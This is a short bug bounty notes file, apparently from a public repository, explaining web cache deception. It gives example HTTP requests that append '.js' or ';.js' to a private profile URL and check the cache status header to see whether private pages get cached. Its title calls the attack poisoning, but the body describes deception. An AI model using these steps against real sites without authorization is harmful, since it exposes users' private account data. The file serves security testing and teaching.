crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Files
🤬
f82c55f9
ROOT /
Web Cache Deception.md
52 lines | ISO-8859-1 | 1 KB

Web Cache Poisoning

Introduction

Web Cache Deception is an attack in which an attacker deceives a caching proxy into improperly storing private information sent over the internet and gaining unauthorized access to that cached data

Where to find

-

How to exploit

  • Normal Request (For example in the settings profile feature)
GET /profile/setting HTTP/1.1
Host: www.vuln.com

The response is

HTTP/2 200 OK 
Content-Type: text/html
Cf-Cache-Status: HIT 
...
  1. Try to add cacheable extension (For example .js / .css / .jpg, etc.)
GET /profile/setting/.js HTTP/1.1
Host: www.vuln.com

The response is

HTTP/2 200 OK 
Content-Type: text/html
Cf-Cache-Status: HIT 
...

If the Cf-Cache-Status response the request with HIT not MISS or Error. And then try to open the url in incognito mode

  1. Add ; before the extension (For example ;.js / ;.css / ;.jpg, etc.)
GET /profile/setting/;.js HTTP/1.1
Host: www.vuln.com

The response is

HTTP/2 200 OK 
Content-Type: text/html
Cf-Cache-Status: HIT 
...

If the Cf-Cache-Status response the request with HIT not MISS or Error. And then try to open the url in incognito mode

References

Please wait...
Page is in error, reload to recover